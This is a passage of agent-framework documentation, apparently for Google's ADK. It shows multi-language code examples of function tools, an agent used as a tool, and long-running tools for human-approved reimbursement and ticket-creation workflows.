func RunAgentSimulation() { // Create the stock agent agent, err := createStockAgent(context.Background()) if err != nil { panic(err) } fmt.Println("Agent created:", agent.Name()) prompts := []string{ "stock price of GOOG", "What's the price of MSFT?", "Can you find the stock price for an unknown company XYZ?", } // Simulate running the agent with different prompts for _, prompt := range prompts { fmt.Printf("\nPrompt: %s\nResponse: ", prompt) callAgent(context.Background(), agent, prompt) fmt.Println("\n---") } } // createSummarizerAgent creates an agent whose sole purpose is to summarize text. func createSummarizerAgent(ctx context.Context) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "SummarizerAgent", Model: model, Instruction: "You are an expert at summarizing text. Take the user's input and provide a concise summary.", Description: "An agent that summarizes text.", }) } // createMainAgent creates the primary agent that will use the summarizer agent as a tool. func createMainAgent(ctx context.Context, tools ...tool.Tool) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "MainAgent", Model: model, Instruction: "You are a helpful assistant. If you are asked to summarize a long text, use the 'summarize' tool. " + "After getting the summary, present it to the user by saying 'Here is a summary of the text:'.", Description: "The main agent that can delegate tasks.", Tools: tools, }) } func RunAgentAsToolSimulation() { ctx := context.Background() // 1. Create the Tool Agent (Summarizer) summarizerAgent, err := createSummarizerAgent(ctx) if err != nil { log.Fatalf("Failed to create summarizer agent: %v", err) } // 2. 
Wrap the Tool Agent in an AgentTool summarizeTool := agenttool.New(summarizerAgent, &agenttool.Config{ SkipSummarization: true, }) // 3. Create the Main Agent and provide it with the AgentTool mainAgent, err := createMainAgent(ctx, summarizeTool) if err != nil { log.Fatalf("Failed to create main agent: %v", err) } // 4. Run the main agent prompt := ` Please summarize this text for me: Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages. ` fmt.Printf("\nPrompt: %s\nResponse: ", prompt) callAgent(context.Background(), mainAgent, prompt) fmt.Println("\n---") } func main() { fmt.Println("Attempting to run the agent simulation...") RunAgentSimulation() fmt.Println("\nAttempting to run the agent-as-a-tool simulation...") RunAgentAsToolSimulation() } ``` The return value from this tool will be a `getStockPriceResults` instance. ```json For input `{"symbol": "GOOG"}`: {"price":300.6,"symbol":"GOOG"} ``` This tool retrieves the mocked value of a stock price. 
```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.FunctionTool;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.reactivex.rxjava3.core.Flowable;
import java.util.HashMap;
import java.util.Map;

public class StockPriceAgent {

  private static final String APP_NAME = "stock_agent";
  private static final String USER_ID = "user1234";

  // Mock stock price data.
  // NOTE: This is a MOCK implementation. In a real Java application,
  // you would use a financial data API or library.
  private static final Map<String, Double> mockStockPrices = new HashMap<>();

  static {
    mockStockPrices.put("GOOG", 1.0);
    mockStockPrices.put("AAPL", 1.0);
    mockStockPrices.put("MSFT", 1.0);
  }

  @Schema(description = "Retrieves the current stock price for a given symbol.")
  public static Map<String, Object> getStockPrice(
      @Schema(description = "The stock symbol (e.g., \"AAPL\", \"GOOG\")", name = "symbol")
          String symbol) {
    try {
      if (mockStockPrices.containsKey(symbol.toUpperCase())) {
        double currentPrice = mockStockPrices.get(symbol.toUpperCase());
        System.out.println("Tool: Found price for " + symbol + ": " + currentPrice);
        return Map.of("symbol", symbol, "price", currentPrice);
      } else {
        return Map.of("symbol", symbol, "error", "No data found for symbol");
      }
    } catch (Exception e) {
      return Map.of("symbol", symbol, "error", e.getMessage());
    }
  }

  public static void callAgent(String prompt) {
    // Create the FunctionTool from the Java method
    FunctionTool getStockPriceTool = FunctionTool.create(StockPriceAgent.class, "getStockPrice");

    LlmAgent stockPriceAgent =
        LlmAgent.builder()
            .model("gemini-2.0-flash")
            .name("stock_agent")
            .instruction(
                "You are an agent who retrieves stock prices. If a ticker symbol is provided, fetch the current price.
 If only a company name is given, first perform a Google search to find the correct ticker symbol before retrieving the stock price. If the provided ticker symbol is invalid or data cannot be retrieved, inform the user that the stock price could not be found.")
            .description(
                "This agent specializes in retrieving real-time stock prices. Given a stock ticker symbol (e.g., AAPL, GOOG, MSFT) or the stock name, use the tools and reliable data sources to provide the most up-to-date price.")
            .tools(getStockPriceTool) // Add the Java FunctionTool
            .build();

    // Create an InMemoryRunner
    InMemoryRunner runner = new InMemoryRunner(stockPriceAgent, APP_NAME);
    // InMemoryRunner automatically creates a session service. Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage = Content.fromParts(Part.fromText(prompt));

    // Run the agent
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }

  public static void main(String[] args) {
    callAgent("stock price of GOOG");
    callAgent("What's the price of MSFT?");
    callAgent("Can you find the stock price for an unknown company XYZ?");
  }
}
```

The return value from this tool will be wrapped into a Map.

```json
For input `GOOG`: {"symbol": "GOOG", "price": 1.0}
```

### Best Practices

While you have considerable flexibility in defining your function, remember that simplicity enhances usability for the LLM. Consider these guidelines:

- **Fewer Parameters are Better:** Minimize the number of parameters to reduce complexity.
- **Simple Data Types:** Favor primitive data types like `str` and `int` over custom classes whenever possible.
- **Meaningful Names:** The function's name and parameter names significantly influence how the LLM interprets and utilizes the tool.
Choose names that clearly reflect the function's purpose and the meaning of its inputs. Avoid generic names like `do_stuff()` or `beAgent()`.
- **Build for Parallel Execution:** Improve function calling performance when multiple tools are run by building for asynchronous operation. For information on enabling parallel execution for tools, see [Increase tool performance with parallel execution](/adk-docs/tools-custom/performance/).

## Long Running Function Tools

A `LongRunningFunctionTool` helps you start and manage tasks that are handled outside your agent workflow and that require a significant amount of processing time, without blocking the agent's execution. It is a subclass of `FunctionTool`.

When using a `LongRunningFunctionTool`, your function can initiate the long-running operation and optionally return an **initial result**, such as a long-running operation ID. Once a long-running function tool is invoked, the agent runner pauses the agent run and lets the agent client decide whether to continue or wait until the long-running operation finishes. The agent client can query the progress of the long-running operation and send back an intermediate or final response. The agent can then continue with other tasks. An example is the human-in-the-loop scenario, where the agent needs human approval before proceeding with a task.

Warning: Execution handling

Long Running Function Tools are designed to help you start and *manage* long-running tasks as part of your agent workflow, but ***not perform*** the actual long task. For tasks that require significant time to complete, you should implement a separate server to do the task.

Tip: Parallel execution

Depending on the type of tool you are building, designing for asynchronous operation may be a better solution than creating a long-running tool. For more information, see [Increase tool performance with parallel execution](/adk-docs/tools-custom/performance/).
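The start-then-check pattern described above can be illustrated without any ADK dependency. The following is a minimal sketch in plain Python, not ADK code: `start_export`, `poll_export`, `run_until_done`, and the in-memory `_JOBS` store are hypothetical names that stand in for your tool function, the agent client's status check, and the external service that does the real work.

```python
import uuid

# Hypothetical in-memory job store standing in for an external service.
_JOBS: dict[str, dict] = {}


def start_export(report_name: str) -> dict:
    """Tool-side function: register the job and return an initial result immediately."""
    operation_id = f"op-{uuid.uuid4().hex[:8]}"
    # Assumption for the sketch: the job reports "pending" for two polls, then finishes.
    _JOBS[operation_id] = {"report": report_name, "polls_left": 2}
    return {"status": "pending", "operation_id": operation_id}


def poll_export(operation_id: str) -> dict:
    """Client-side check: report the current status without blocking."""
    job = _JOBS[operation_id]
    if job["polls_left"] > 0:
        job["polls_left"] -= 1
        return {"status": "pending", "operation_id": operation_id}
    return {"status": "done", "operation_id": operation_id, "report": job["report"]}


def run_until_done(report_name: str) -> list[str]:
    """Collect every status seen, from the initial result to the final response."""
    initial = start_export(report_name)
    statuses = [initial["status"]]
    while statuses[-1] != "done":
        statuses.append(poll_export(initial["operation_id"])["status"])
    return statuses
```

In an ADK workflow, the dictionary returned by the start function plays the role of the initial result, and each later status dictionary corresponds to an intermediate or final response that the agent client sends back to the agent.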
### How it Works

In Python, you wrap a function with `LongRunningFunctionTool`. In Java, you pass a method name to `LongRunningFunctionTool.create()`. In TypeScript, you instantiate the `LongRunningFunctionTool` class.

1. **Initiation:** When the LLM calls the tool, your function starts the long-running operation.
1. **Initial Updates:** Your function can optionally return an initial result (e.g., the long-running operation ID). The ADK framework takes the result and sends it back to the LLM packaged within a `FunctionResponse`. This allows the LLM to inform the user (e.g., status, percentage complete, messages). The agent run is then ended or paused.
1. **Continue or Wait:** After each agent run completes, the agent client can query the progress of the long-running operation and decide whether to continue the agent run with an intermediate response (to update the progress) or wait until a final response is retrieved. The agent client should send the intermediate or final response back to the agent for the next run.
1. **Framework Handling:** The ADK framework manages the execution. It sends the intermediate or final `FunctionResponse` sent by the agent client to the LLM to generate a user-friendly message.

### Creating the Tool

Define your tool function and wrap it using the `LongRunningFunctionTool` class:

```python
from typing import Any

from google.adk.tools import LongRunningFunctionTool

# 1. Define the long running function
def ask_for_approval(
    purpose: str, amount: float
) -> dict[str, Any]:
    """Ask for approval for the reimbursement."""
    # create a ticket for the approval
    # Send a notification to the approver with the link of the ticket
    return {'status': 'pending', 'approver': 'Sean Zhou', 'purpose' : purpose, 'amount': amount, 'ticket-id': 'approval-ticket-1'}

def reimburse(purpose: str, amount: float) -> dict[str, Any]:
    """Reimburse the amount of money to the employee."""
    # send the reimbursement request to payment vendor
    return {'status': 'ok'}

# 2.
Wrap the function with LongRunningFunctionTool long_running_tool = LongRunningFunctionTool(func=ask_for_approval) ``` ```typescript // 1. Define the long-running function function askForApproval(args: {purpose: string; amount: number}) { /** * Ask for approval for the reimbursement. */ // create a ticket for the approval // Send a notification to the approver with the link of the ticket return { "status": "pending", "approver": "Sean Zhou", "purpose": args.purpose, "amount": args.amount, "ticket-id": "approval-ticket-1", }; } // 2. Instantiate the LongRunningFunctionTool class with the long-running function const longRunningTool = new LongRunningFunctionTool({ name: "ask_for_approval", description: "Ask for approval for the reimbursement.", parameters: z.object({ purpose: z.string().describe("The purpose of the reimbursement."), amount: z.number().describe("The amount to reimburse."), }), execute: askForApproval, }); ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // CreateTicketArgs defines the arguments for our long-running tool. type CreateTicketArgs struct { Urgency string `json:"urgency" jsonschema:"The urgency level of the ticket."` } // CreateTicketResults defines the *initial* output of our long-running tool. type CreateTicketResults struct { Status string `json:"status"` TicketId string `json:"ticket_id"` } // createTicketAsync simulates the *initiation* of a long-running ticket creation task. func createTicketAsync(ctx tool.Context, args CreateTicketArgs) (CreateTicketResults, error) { log.Printf("TOOL_EXEC: 'create_ticket_long_running' called with urgency: %s (Call ID: %s)\n", args.Urgency, ctx.FunctionCallID()) // "Generate" a ticket ID and return it in the initial response. 
ticketID := "TICKET-ABC-123" log.Printf("ACTION: Generated Ticket ID: %s for Call ID: %s\n", ticketID, ctx.FunctionCallID()) // In a real application, you would save the association between the // FunctionCallID and the ticketID to handle the async response later. return CreateTicketResults{ Status: "started", TicketId: ticketID, }, nil } func createTicketAgent(ctx context.Context) (agent.Agent, error) { ticketTool, err := functiontool.New( functiontool.Config{ Name: "create_ticket_long_running", Description: "Creates a new support ticket with a specified urgency level.", }, createTicketAsync, ) if err != nil { return nil, fmt.Errorf("failed to create long running tool: %w", err) } model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, fmt.Errorf("failed to create model: %v", err) } return llmagent.New(llmagent.Config{ Name: "ticket_agent", Model: model, Instruction: "You are a helpful assistant for creating support tickets. Provide the status of the ticket at each interaction.", Tools: []tool.Tool{ticketTool}, }) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.tools.LongRunningFunctionTool; import java.util.HashMap; import java.util.Map; public class ExampleLongRunningFunction { // Define your Long Running function. // Ask for approval for the reimbursement. 
  public static Map<String, Object> askForApproval(String purpose, double amount) {
    // Simulate creating a ticket and sending a notification
    System.out.println(
        "Simulating ticket creation for purpose: " + purpose + ", amount: " + amount);

    // Send a notification to the approver with the link of the ticket
    Map<String, Object> result = new HashMap<>();
    result.put("status", "pending");
    result.put("approver", "Sean Zhou");
    result.put("purpose", purpose);
    result.put("amount", amount);
    result.put("ticket-id", "approval-ticket-1");
    return result;
  }

  public static void main(String[] args) throws NoSuchMethodException {
    // Pass the method to LongRunningFunctionTool.create
    LongRunningFunctionTool approveTool =
        LongRunningFunctionTool.create(ExampleLongRunningFunction.class, "askForApproval");

    // Include the tool in the agent
    LlmAgent approverAgent =
        LlmAgent.builder()
            // ...
            .tools(approveTool)
            .build();
  }
}
```

### Intermediate / Final result Updates

The agent client receives an event containing the long-running function call and checks the status of the ticket. The agent client can then send an intermediate or final response back to update the progress. The framework packages this value (even if it's `None`) into the content of the `FunctionResponse` sent back to the LLM.

Note: Long running function response with Resume feature

If your ADK agent workflow is configured with the [Resume](/adk-docs/runtime/resume/) feature, you must also include the Invocation ID (`invocation_id`) parameter with the long-running function response. The Invocation ID you provide must belong to the same invocation that generated the long-running function request; otherwise the system starts a new invocation with the response. If your agent uses the Resume feature, consider including the Invocation ID as a parameter with your long-running function request, so it can be included with the response. For more details on using the Resume feature, see [Resume stopped agents](/adk-docs/runtime/resume/).
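One way to keep the Invocation ID paired with its function call is to record both when the long-running request is observed and look them up when the response is ready. The sketch below is plain Python bookkeeping under stated assumptions, not an ADK API: `PendingCall`, `PendingCallRegistry`, and the shape of the returned dictionary are hypothetical, and how the `invocation_id` is actually handed to the runner depends on your ADK version and is not shown here.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class PendingCall:
    """Hypothetical record of one outstanding long-running function call."""
    function_call_id: str
    invocation_id: str
    tool_name: str


class PendingCallRegistry:
    """Remembers which invocation produced each long-running function call."""

    def __init__(self) -> None:
        self._by_call_id: dict[str, PendingCall] = {}

    def remember(self, call: PendingCall) -> None:
        self._by_call_id[call.function_call_id] = call

    def build_response(self, function_call_id: str, result: dict) -> dict:
        # pop() removes the record, so a second response for the same call raises KeyError.
        call = self._by_call_id.pop(function_call_id)
        return {
            "invocation_id": call.invocation_id,
            "function_response": {
                "id": call.function_call_id,
                "name": call.tool_name,
                "response": result,
            },
        }
```

A client would call `remember()` when it sees the long-running function call event and `build_response()` once the external work finishes, which guarantees that the response carries the Invocation ID of the invocation that issued the request.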
Applies only to Java ADK

When passing `ToolContext` with Function Tools, ensure that one of the following is true:

- The Schema is passed with the ToolContext parameter in the function signature, like:

```text
@com.google.adk.tools.Annotations.Schema(name = "toolContext") ToolContext toolContext
```

OR

- The following `-parameters` flag is set on the Maven compiler plugin:

```text
<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-compiler-plugin</artifactId>
  <version>3.14.0</version>
  <configuration>
    <compilerArgs>
      <arg>-parameters</arg>
    </compilerArgs>
  </configuration>
</plugin>
```

This constraint is temporary and will be removed.

```python
# Agent Interaction
async def call_agent_async(query):

    def get_long_running_function_call(event: Event) -> types.FunctionCall:
        # Get the long running function call from the event
        if not event.long_running_tool_ids or not event.content or not event.content.parts:
            return
        for part in event.content.parts:
            if (
                part
                and part.function_call
                and event.long_running_tool_ids
                and part.function_call.id in event.long_running_tool_ids
            ):
                return part.function_call

    def get_function_response(event: Event, function_call_id: str) -> types.FunctionResponse:
        # Get the function response for the function call with specified id.
        if not event.content or not event.content.parts:
            return
        for part in event.content.parts:
            if (
                part
                and part.function_response
                and part.function_response.id == function_call_id
            ):
                return part.function_response

    content = types.Content(role='user', parts=[types.Part(text=query)])
    session, runner = await setup_session_and_runner()

    print("\nRunning agent...")
    events_async = runner.run_async(
        session_id=session.id, user_id=USER_ID, new_message=content
    )

    long_running_function_call, long_running_function_response, ticket_id = None, None, None
    async for event in events_async:
        # Use the helpers to find the long running function call, then its response
        if not long_running_function_call:
            long_running_function_call = get_long_running_function_call(event)
        else:
            _potential_response = get_function_response(event, long_running_function_call.id)
            if _potential_response:  # Only update if we get a non-None response
                long_running_function_response = _potential_response
                ticket_id = long_running_function_response.response['ticket-id']
        if event.content and event.content.parts:
            if text := ''.join(part.text or '' for part in event.content.parts):
                print(f'[{event.author}]: {text}')

    if long_running_function_response:
        # query the status of the corresponding ticket via ticket_id
        # send back an intermediate / final response
        updated_response = long_running_function_response.model_copy(deep=True)
        updated_response.response = {'status': 'approved'}
        async for event in runner.run_async(
            session_id=session.id, user_id=USER_ID, new_message=types.Content(parts=[types.Part(function_response=updated_response)], role='user')
        ):
            if event.content and event.content.parts:
                if text := ''.join(part.text or '' for part in event.content.parts):
                    print(f'[{event.author}]: {text}')
```

```typescript
/**
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
* You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, Runner, FunctionTool, LongRunningFunctionTool, InMemorySessionService, Event, stringifyContent, } from "@google/adk"; import {z} from "zod"; import {Content, FunctionCall, FunctionResponse, createUserContent} from "@google/genai"; // 1. Define the long-running function function askForApproval(args: {purpose: string; amount: number}) { /** * Ask for approval for the reimbursement. */ // create a ticket for the approval // Send a notification to the approver with the link of the ticket return { "status": "pending", "approver": "Sean Zhou", "purpose": args.purpose, "amount": args.amount, "ticket-id": "approval-ticket-1", }; } // 2. Instantiate the LongRunningFunctionTool class with the long-running function const longRunningTool = new LongRunningFunctionTool({ name: "ask_for_approval", description: "Ask for approval for the reimbursement.", parameters: z.object({ purpose: z.string().describe("The purpose of the reimbursement."), amount: z.number().describe("The amount to reimburse."), }), execute: askForApproval, }); function reimburse(args: {purpose: string; amount: number}) { /** * Reimburse the amount of money to the employee. */ // send the reimbursement request to payment vendor return {status: "ok"}; } const reimburseTool = new FunctionTool({ name: "reimburse", description: "Reimburse the amount of money to the employee.", parameters: z.object({ purpose: z.string().describe("The purpose of the reimbursement."), amount: z.number().describe("The amount to reimburse."), }), execute: reimburse, }); // 3. 
Use the tool in an Agent const reimbursementAgent = new LlmAgent({ model: "gemini-2.5-flash", name: "reimbursement_agent", instruction: ` You are an agent whose job is to handle the reimbursement process for the employees. If the amount is less than $100, you will automatically approve the reimbursement. If the amount is greater than $100, you will ask for approval from the manager. If the manager approves, you will call reimburse() to reimburse the amount to the employee. If the manager rejects, you will inform the employee of the rejection. `, tools: [reimburseTool, longRunningTool], }); const APP_NAME = "human_in_the_loop"; const USER_ID = "1234"; const SESSION_ID = "session1234"; // Session and Runner async function setupSessionAndRunner() { const sessionService = new InMemorySessionService(); const session = await sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID, }); const runner = new Runner({ agent: reimbursementAgent, appName: APP_NAME, sessionService: sessionService, }); return {session, runner}; } function getLongRunningFunctionCall(event: Event): FunctionCall | undefined { // Get the long-running function call from the event if ( !event.longRunningToolIds || !event.content || !event.content.parts?.length ) { return; } for (const part of event.content.parts) { if ( part && part.functionCall && event.longRunningToolIds && part.functionCall.id && event.longRunningToolIds.includes(part.functionCall.id) ) { return part.functionCall; } } } function getFunctionResponse( event: Event, functionCallId: string ): FunctionResponse | undefined { // Get the function response for the function call with specified id. 
if (!event.content || !event.content.parts?.length) { return; } for (const part of event.content.parts) { if ( part && part.functionResponse && part.functionResponse.id === functionCallId ) { return part.functionResponse; } } } // Agent Interaction async function callAgentAsync(query: string) { let longRunningFunctionCall: FunctionCall | undefined; let longRunningFunctionResponse: FunctionResponse | undefined; let ticketId: string | undefined; const content: Content = createUserContent(query); const {session, runner} = await setupSessionAndRunner(); console.log("\nRunning agent..."); const events = runner.runAsync({ sessionId: session.id, userId: USER_ID, newMessage: content, }); for await (const event of events) { // Use helper to check for the specific auth request event if (!longRunningFunctionCall) { longRunningFunctionCall = getLongRunningFunctionCall(event); } else { const _potentialResponse = getFunctionResponse( event, longRunningFunctionCall.id! ); if (_potentialResponse) { // Only update if we get a non-None response longRunningFunctionResponse = _potentialResponse; ticketId = ( longRunningFunctionResponse.response as {[key: string]: any} )[`ticket-id`]; } } const text = stringifyContent(event); if (text) { console.log(`[${event.author}]: ${text}`); } } if (longRunningFunctionResponse) { // query the status of the corresponding ticket via ticket_id // send back an intermediate / final response const updatedResponse = JSON.parse( JSON.stringify(longRunningFunctionResponse) ); updatedResponse.response = {status: "approved"}; for await (const event of runner.runAsync({ sessionId: session.id, userId: USER_ID, newMessage: createUserContent(JSON.stringify({functionResponse: updatedResponse})), })) { const text = stringifyContent(event); if (text) { console.log(`[${event.author}]: ${text}`); } } } } async function main() { // reimbursement that doesn't require approval await callAgentAsync("Please reimburse 50$ for meals"); // reimbursement that requires 
approval await callAgentAsync("Please reimburse 200$ for meals"); } main(); ``` The following example demonstrates a multi-turn workflow. First, the user asks the agent to create a ticket. The agent calls the long-running tool and the client captures the `FunctionCall` ID. The client then simulates the asynchronous work completing by sending subsequent `FunctionResponse` messages back to the agent to provide the ticket ID and final status. ```go // runTurn executes a single turn with the agent and returns the captured function call ID. func runTurn(ctx context.Context, r *runner.Runner, sessionID, turnLabel string, content *genai.Content) string { var funcCallID atomic.Value // Safely store the found ID. fmt.Printf("\n--- %s ---\n", turnLabel) for event, err := range r.Run(ctx, userID, sessionID, content, agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }) { if err != nil { fmt.Printf("\nAGENT_ERROR: %v\n", err) continue } // Print a summary of the event for clarity. printEventSummary(event, turnLabel) // Capture the function call ID from the event. for _, part := range event.Content.Parts { if fc := part.FunctionCall; fc != nil { if fc.Name == "create_ticket_long_running" { funcCallID.Store(fc.ID) } } } } if id, ok := funcCallID.Load().(string); ok { return id } return "" } func main() { ctx := context.Background() ticketAgent, err := createTicketAgent(ctx) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Setup the runner and session. sessionService := session.InMemoryService() session, err := sessionService.Create(ctx, &session.CreateRequest{AppName: appName, UserID: userID}) if err != nil { log.Fatalf("Failed to create session: %v", err) } r, err := runner.New(runner.Config{AppName: appName, Agent: ticketAgent, SessionService: sessionService}) if err != nil { log.Fatalf("Failed to create runner: %v", err) } // --- Turn 1: User requests to create a ticket. 
--- initialUserMessage := genai.NewContentFromText("Create a high urgency ticket for me.", genai.RoleUser) funcCallID := runTurn(ctx, r, session.Session.ID(), "Turn 1: User Request", initialUserMessage) if funcCallID == "" { log.Fatal("ERROR: Tool 'create_ticket_long_running' not called in Turn 1.") } fmt.Printf("ACTION: Captured FunctionCall ID: %s\n", funcCallID) // --- Turn 2: App provides the final status of the ticket. --- // In a real application, the ticketID would be retrieved from a database // using the funcCallID. For this example, we'll use the same ID. ticketID := "TICKET-ABC-123" willContinue := false // Signal that this is the final response. ticketStatusResponse := &genai.FunctionResponse{ Name: "create_ticket_long_running", ID: funcCallID, Response: map[string]any{ "status": "approved", "ticket_id": ticketID, }, WillContinue: &willContinue, } appResponseWithStatus := &genai.Content{ Role: string(genai.RoleUser), Parts: []*genai.Part{{FunctionResponse: ticketStatusResponse}}, } runTurn(ctx, r, session.Session.ID(), "Turn 2: App provides ticket status", appResponseWithStatus) fmt.Println("Long running function completed successfully.") } // printEventSummary provides a readable log of agent and LLM interactions. func printEventSummary(event *session.Event, turnLabel string) { for _, part := range event.Content.Parts { // Check for a text part. if part.Text != "" { fmt.Printf("[%s][%s_TEXT]: %s\n", turnLabel, event.Author, part.Text) } // Check for a function call part. 
		if fc := part.FunctionCall; fc != nil {
			fmt.Printf("[%s][%s_CALL]: %s(%v) ID: %s\n", turnLabel, event.Author, fc.Name, fc.Args, fc.ID)
		}
	}
}
```

```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.runner.Runner;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.LongRunningFunctionTool;
import com.google.adk.tools.ToolContext;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.genai.types.Content;
import com.google.genai.types.FunctionCall;
import com.google.genai.types.FunctionResponse;
import com.google.genai.types.Part;
import java.util.Optional;
import java.util.UUID;
import java.util.concurrent.atomic.AtomicReference;
import java.util.stream.Collectors;

public class LongRunningFunctionExample {

  private static String USER_ID = "user123";

  @Schema(
      name = "create_ticket_long_running",
      description =
          """
          Creates a new support ticket with a specified urgency level.
          Examples of urgency are 'high', 'medium', or 'low'.
          The ticket creation is a long-running process, and its ID will be provided when ready.
          """)
  public static void createTicketAsync(
      @Schema(
              name = "urgency",
              description =
                  "The urgency level for the new ticket, such as 'high', 'medium', or 'low'.")
          String urgency,
      @Schema(name = "toolContext") // Ensures ADK injection
          ToolContext toolContext) {
    System.out.printf(
        "TOOL_EXEC: 'create_ticket_long_running' called with urgency: %s (Call ID: %s)%n",
        urgency, toolContext.functionCallId().orElse("N/A"));
  }

  public static void main(String[] args) {
    LlmAgent agent =
        LlmAgent.builder()
            .name("ticket_agent")
            .description("Agent for creating tickets via a long-running task.")
            .model("gemini-2.0-flash")
            .tools(
                ImmutableList.of(
                    LongRunningFunctionTool.create(
                        LongRunningFunctionExample.class, "createTicketAsync")))
            .build();

    Runner runner = new InMemoryRunner(agent);
    Session session =
        runner.sessionService().createSession(agent.name(), USER_ID, null, null).blockingGet();

    // --- Turn 1: User requests ticket ---
    System.out.println("\n--- Turn 1: User Request ---");
    Content initialUserMessage =
        Content.fromParts(Part.fromText("Create a high urgency ticket for me."));

    AtomicReference<String> funcCallIdRef = new AtomicReference<>();
    runner
        .runAsync(USER_ID, session.id(), initialUserMessage)
        .blockingForEach(
            event -> {
              printEventSummary(event, "T1");
              if (funcCallIdRef.get() == null) { // Capture the first relevant function call ID
                event.content().flatMap(Content::parts).orElse(ImmutableList.of()).stream()
                    .map(Part::functionCall)
                    .flatMap(Optional::stream)
                    .filter(fc -> "create_ticket_long_running".equals(fc.name().orElse("")))
                    .findFirst()
                    .flatMap(FunctionCall::id)
                    .ifPresent(funcCallIdRef::set);
              }
            });

    if (funcCallIdRef.get() == null) {
      System.out.println("ERROR: Tool 'create_ticket_long_running' not called in Turn 1.");
      return;
    }
    System.out.println("ACTION: Captured FunctionCall ID: " + funcCallIdRef.get());

    // --- Turn 2: App provides initial ticket_id (simulating async tool completion) ---
    System.out.println("\n--- Turn 2: App provides ticket_id ---");
    String ticketId =
"TICKET-" + UUID.randomUUID().toString().substring(0, 8).toUpperCase(); FunctionResponse ticketCreatedFuncResponse = FunctionResponse.builder() .name("create_ticket_long_running") .id(funcCallIdRef.get()) .response(ImmutableMap.of("ticket_id", ticketId)) .build(); Content appResponseWithTicketId = Content.builder() .parts( ImmutableList.of( Part.builder().functionResponse(ticketCreatedFuncResponse).build())) .role("user") .build(); runner .runAsync(USER_ID, session.id(), appResponseWithTicketId) .blockingForEach(event -> printEventSummary(event, "T2")); System.out.println("ACTION: Sent ticket_id " + ticketId + " to agent."); // --- Turn 3: App provides ticket status update --- System.out.println("\n--- Turn 3: App provides ticket status ---"); FunctionResponse ticketStatusFuncResponse = FunctionResponse.builder() .name("create_ticket_long_running") .id(funcCallIdRef.get()) .response(ImmutableMap.of("status", "approved", "ticket_id", ticketId)) .build(); Content appResponseWithStatus = Content.builder() .parts( ImmutableList.of(Part.builder().functionResponse(ticketStatusFuncResponse).build())) .role("user") .build(); runner .runAsync(USER_ID, session.id(), appResponseWithStatus) .blockingForEach(event -> printEventSummary(event, "T3_FINAL")); System.out.println("Long running function completed successfully."); } private static void printEventSummary(Event event, String turnLabel) { event .content() .ifPresent( content -> { String text = content.parts().orElse(ImmutableList.of()).stream() .map(part -> part.text().orElse("")) .filter(s -> !s.isEmpty()) .collect(Collectors.joining(" ")); if (!text.isEmpty()) { System.out.printf("[%s][%s_TEXT]: %s%n", turnLabel, event.author(), text); } content.parts().orElse(ImmutableList.of()).stream() .map(Part::functionCall) .flatMap(Optional::stream) .findFirst() // Assuming one function call per relevant event for simplicity .ifPresent( fc -> System.out.printf( "[%s][%s_CALL]: %s(%s) ID: %s%n", turnLabel, event.author(), 
                              fc.name().orElse("N/A"),
                              fc.args().orElse(ImmutableMap.of()),
                              fc.id().orElse("N/A")));
            });
  }
}
```

Python complete example: File Processing Simulation

```python
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import asyncio
from typing import Any
from google.adk.agents import Agent
from google.adk.events import Event
from google.adk.runners import Runner
from google.adk.tools import LongRunningFunctionTool
from google.adk.sessions import InMemorySessionService
from google.genai import types

# 1. Define the long running function
def ask_for_approval(
    purpose: str, amount: float
) -> dict[str, Any]:
    """Ask for approval for the reimbursement."""
    # create a ticket for the approval
